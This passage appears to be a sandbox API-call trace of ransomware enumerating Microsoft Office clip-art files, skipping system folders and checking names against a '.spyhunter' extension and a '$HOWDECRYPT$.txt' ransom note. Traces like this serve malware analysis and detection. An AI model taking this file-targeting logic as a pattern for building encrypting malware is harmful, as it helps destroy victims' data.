[0097.050] lstrcmpW (lpString1="BD09194_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.050] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 67 [0097.050] GetProcessHeap () returned 0x2c0000 [0097.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f778 [0097.051] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1790) returned 0x2c310e0 [0097.051] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.051] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="Windows") returned -1 [0097.051] lstrlenW (lpString="Windows") returned 7 [0097.051] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="$Recycle.bin") returned 1 [0097.051] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.051] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="System Volume Information") returned -1 [0097.051] lstrlenW (lpString="System Volume Information") returned 25 [0097.051] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 67 [0097.051] StrStrIW (lpFirst="BD09662_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.051] lstrcmpW (lpString1="BD09662_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.051] lstrcmpW (lpString1="BD09662_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.051] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 67 [0097.051] GetProcessHeap () returned 0x2c0000 [0097.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f848 [0097.051] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1798) returned 0x2c310e0 [0097.051] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.051] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="Windows") returned -1 [0097.051] lstrlenW (lpString="Windows") returned 7 [0097.051] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="$Recycle.bin") returned 1 [0097.051] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.051] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="System Volume Information") returned -1 [0097.052] lstrlenW (lpString="System Volume Information") returned 25 [0097.052] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 67 [0097.052] StrStrIW (lpFirst="BD09664_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.052] lstrcmpW (lpString1="BD09664_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.052] lstrcmpW (lpString1="BD09664_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.052] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 67 [0097.052] GetProcessHeap () returned 0x2c0000 [0097.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f918 [0097.052] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17a0) returned 0x2c310e0 [0097.052] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.052] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="Windows") returned -1 [0097.052] lstrlenW (lpString="Windows") returned 7 [0097.052] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="$Recycle.bin") returned 1 [0097.052] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.052] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="System Volume Information") returned -1 [0097.052] lstrlenW (lpString="System Volume Information") returned 25 [0097.052] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 67 [0097.052] StrStrIW (lpFirst="BD10890_.GIF", lpSrch=".spyhunter") returned 0x0 [0097.052] lstrcmpW (lpString1="BD10890_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.052] lstrcmpW (lpString1="BD10890_.GIF", lpString2="_uninstalling_.png") returned 1 [0097.052] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 67 [0097.052] GetProcessHeap () returned 0x2c0000 [0097.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f9e8 [0097.053] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17a8) returned 0x2c310e0 [0097.053] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.053] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="Windows") returned -1 [0097.053] lstrlenW (lpString="Windows") returned 7 [0097.053] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="$Recycle.bin") returned 1 [0097.053] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.053] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="System Volume Information") returned -1 [0097.053] lstrlenW (lpString="System Volume Information") returned 25 [0097.053] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 67 [0097.053] StrStrIW (lpFirst="BD10972_.GIF", lpSrch=".spyhunter") returned 0x0 [0097.053] lstrcmpW (lpString1="BD10972_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.053] lstrcmpW (lpString1="BD10972_.GIF", lpString2="_uninstalling_.png") returned 1 [0097.053] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 67 [0097.053] GetProcessHeap () returned 0x2c0000 [0097.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34fab8 [0097.053] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17b0) returned 0x2c310e0 [0097.053] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.053] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="Windows") returned -1 [0097.053] lstrlenW (lpString="Windows") returned 7 [0097.053] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="$Recycle.bin") returned 1 [0097.053] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.053] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="System Volume Information") returned -1 [0097.054] lstrlenW (lpString="System Volume Information") returned 25 [0097.054] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 67 [0097.054] StrStrIW (lpFirst="BD19563_.GIF", lpSrch=".spyhunter") returned 0x0 [0097.054] lstrcmpW (lpString1="BD19563_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.054] lstrcmpW (lpString1="BD19563_.GIF", lpString2="_uninstalling_.png") returned 1 [0097.054] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 67 [0097.054] GetProcessHeap () returned 0x2c0000 [0097.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34fb88 [0097.054] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17b8) returned 0x2c310e0 [0097.054] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.054] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="Windows") returned -1 [0097.054] lstrlenW (lpString="Windows") returned 7 [0097.054] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="$Recycle.bin") returned 1 [0097.054] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.054] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="System Volume Information") returned -1 [0097.054] lstrlenW (lpString="System Volume Information") returned 25 [0097.054] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 67 [0097.054] StrStrIW (lpFirst="BD19582_.GIF", lpSrch=".spyhunter") returned 0x0 [0097.054] lstrcmpW (lpString1="BD19582_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.054] lstrcmpW (lpString1="BD19582_.GIF", lpString2="_uninstalling_.png") returned 1 [0097.054] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 67 [0097.054] GetProcessHeap () returned 0x2c0000 [0097.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34fc58 [0097.055] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17c0) returned 0x2c310e0 [0097.055] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.055] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="Windows") returned -1 [0097.055] lstrlenW (lpString="Windows") returned 7 [0097.055] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="$Recycle.bin") returned 1 [0097.055] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.055] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="System Volume Information") returned -1 [0097.055] lstrlenW (lpString="System Volume Information") returned 25 [0097.055] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 67 [0097.055] StrStrIW (lpFirst="BD19695_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.055] lstrcmpW (lpString1="BD19695_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.055] lstrcmpW (lpString1="BD19695_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.055] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 67 [0097.055] GetProcessHeap () returned 0x2c0000 [0097.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34fd28 [0097.055] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17c8) returned 0x2c310e0 [0097.055] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.056] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="Windows") returned -1 [0097.056] lstrlenW (lpString="Windows") returned 7 [0097.056] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="$Recycle.bin") returned 1 [0097.056] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.057] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="System Volume Information") returned -1 [0097.057] lstrlenW (lpString="System Volume Information") returned 25 [0097.057] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 67 [0097.057] StrStrIW (lpFirst="BD19827_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.057] lstrcmpW (lpString1="BD19827_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.057] lstrcmpW (lpString1="BD19827_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 67 [0097.057] GetProcessHeap () returned 0x2c0000 [0097.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34fdf8 [0097.057] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17d0) returned 0x2c310e0 [0097.057] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.057] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="Windows") returned -1 [0097.057] lstrlenW (lpString="Windows") returned 7 [0097.057] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="$Recycle.bin") returned 1 [0097.057] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.057] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="System Volume Information") returned -1 [0097.057] lstrlenW (lpString="System Volume Information") returned 25 [0097.057] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 67 [0097.057] StrStrIW (lpFirst="BD19828_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.057] lstrcmpW (lpString1="BD19828_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.057] lstrcmpW (lpString1="BD19828_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 67 [0097.057] GetProcessHeap () returned 0x2c0000 [0097.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34fec8 [0097.058] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17d8) returned 0x2c310e0 [0097.058] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.058] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="Windows") returned -1 [0097.058] lstrlenW (lpString="Windows") returned 7 [0097.058] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="$Recycle.bin") returned 1 [0097.058] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.058] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="System Volume Information") returned -1 [0097.058] lstrlenW (lpString="System Volume Information") returned 25 [0097.058] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 67 [0097.058] StrStrIW (lpFirst="BD19986_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.058] lstrcmpW (lpString1="BD19986_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.058] lstrcmpW (lpString1="BD19986_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.058] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 67 [0097.058] GetProcessHeap () returned 0x2c0000 [0097.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ff98 [0097.058] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17e0) returned 0x2c310e0 [0097.058] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.058] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="Windows") returned -1 [0097.058] lstrlenW (lpString="Windows") returned 7 [0097.058] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="$Recycle.bin") returned 1 [0097.058] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.059] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="System Volume Information") returned -1 [0097.059] lstrlenW (lpString="System Volume Information") returned 25 [0097.059] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 67 [0097.059] StrStrIW (lpFirst="BD19988_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.059] lstrcmpW (lpString1="BD19988_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.059] lstrcmpW (lpString1="BD19988_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 67 [0097.059] GetProcessHeap () returned 0x2c0000 [0097.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x350068 [0097.059] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17e8) returned 0x2c310e0 [0097.059] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.059] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="Windows") returned -1 [0097.059] lstrlenW (lpString="Windows") returned 7 [0097.059] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="$Recycle.bin") returned 1 [0097.059] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.059] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="System Volume Information") returned -1 [0097.059] lstrlenW (lpString="System Volume Information") returned 25 [0097.059] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 67 [0097.059] StrStrIW (lpFirst="BD20013_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.059] lstrcmpW (lpString1="BD20013_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.059] lstrcmpW (lpString1="BD20013_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 67 [0097.059] GetProcessHeap () returned 0x2c0000 [0097.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x350138 [0097.060] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17f0) returned 0x2c310e0 [0097.060] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.060] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="Windows") returned -1 [0097.060] lstrlenW (lpString="Windows") returned 7 [0097.060] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="$Recycle.bin") returned 1 [0097.060] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.060] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="System Volume Information") returned -1 [0097.060] lstrlenW (lpString="System Volume Information") returned 25 [0097.060] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 67 [0097.060] StrStrIW (lpFirst="BL00008_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.060] lstrcmpW (lpString1="BL00008_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.060] lstrcmpW (lpString1="BL00008_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.060] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 67 [0097.060] GetProcessHeap () returned 0x2c0000 [0097.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x350208 [0097.060] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x17f8) returned 0x2c310e0 [0097.060] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.060] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="Windows") returned -1 [0097.060] lstrlenW (lpString="Windows") returned 7 [0097.061] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="$Recycle.bin") returned 1 [0097.061] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.061] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="System Volume Information") returned -1 [0097.061] lstrlenW (lpString="System Volume Information") returned 25 [0097.061] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 67 [0097.061] StrStrIW (lpFirst="BL00012_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.061] lstrcmpW (lpString1="BL00012_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.061] lstrcmpW (lpString1="BL00012_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.061] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 67 [0097.061] GetProcessHeap () returned 0x2c0000 [0097.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3502d8 [0097.061] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1800) returned 0x2c310e0 [0097.061] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.061] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="Windows") returned -1 [0097.061] lstrlenW (lpString="Windows") returned 7 [0097.061] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="$Recycle.bin") returned 1 [0097.061] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.061] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="System Volume Information") returned -1 [0097.061] lstrlenW (lpString="System Volume Information") returned 25 [0097.061] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 67 [0097.061] StrStrIW (lpFirst="BL00045_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.061] lstrcmpW (lpString1="BL00045_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.062] lstrcmpW (lpString1="BL00045_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.062] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 67 [0097.062] GetProcessHeap () returned 0x2c0000 [0097.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3503a8 [0097.062] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1808) returned 0x2c310e0 [0097.062] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.062] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="Windows") returned -1 [0097.062] lstrlenW (lpString="Windows") returned 7 [0097.062] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="$Recycle.bin") returned 1 [0097.062] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.062] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="System Volume Information") returned -1 [0097.062] lstrlenW (lpString="System Volume Information") returned 25 [0097.062] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 67 [0097.062] StrStrIW (lpFirst="BL00098_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.062] lstrcmpW (lpString1="BL00098_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.062] lstrcmpW (lpString1="BL00098_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.062] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 67 [0097.062] GetProcessHeap () returned 0x2c0000 [0097.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x350478 [0097.062] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1810) returned 0x2c310e0 [0097.062] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.062] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="Windows") returned -1 [0097.063] lstrlenW (lpString="Windows") returned 7 [0097.063] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="$Recycle.bin") returned 1 [0097.063] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.063] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="System Volume Information") returned -1 [0097.063] lstrlenW (lpString="System Volume Information") returned 25 [0097.063] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 67 [0097.063] StrStrIW (lpFirst="BL00105_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.063] lstrcmpW (lpString1="BL00105_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.063] lstrcmpW (lpString1="BL00105_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.063] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 67 [0097.063] GetProcessHeap () returned 0x2c0000 [0097.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x350548 [0097.063] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1818) returned 0x2c310e0 [0097.063] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.063] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="Windows") returned -1 [0097.063] lstrlenW (lpString="Windows") returned 7 [0097.063] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="$Recycle.bin") returned 1 [0097.063] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.063] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="System Volume Information") returned -1 [0097.063] lstrlenW (lpString="System Volume Information") returned 25 [0097.063] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 67 [0097.063] StrStrIW (lpFirst="BL00122_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.063] lstrcmpW (lpString1="BL00122_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.064] lstrcmpW (lpString1="BL00122_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 67 [0097.064] GetProcessHeap () returned 0x2c0000 [0097.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x350618 [0097.064] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1820) returned 0x2c310e0 [0097.064] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.064] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="Windows") returned -1 [0097.064] lstrlenW (lpString="Windows") returned 7 [0097.064] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="$Recycle.bin") returned 1 [0097.064] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.064] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="System Volume Information") returned -1 [0097.064] lstrlenW (lpString="System Volume Information") returned 25 [0097.064] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 67 [0097.064] StrStrIW (lpFirst="BL00130_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.064] lstrcmpW (lpString1="BL00130_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.064] lstrcmpW (lpString1="BL00130_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 67 [0097.064] GetProcessHeap () returned 0x2c0000 [0097.064] 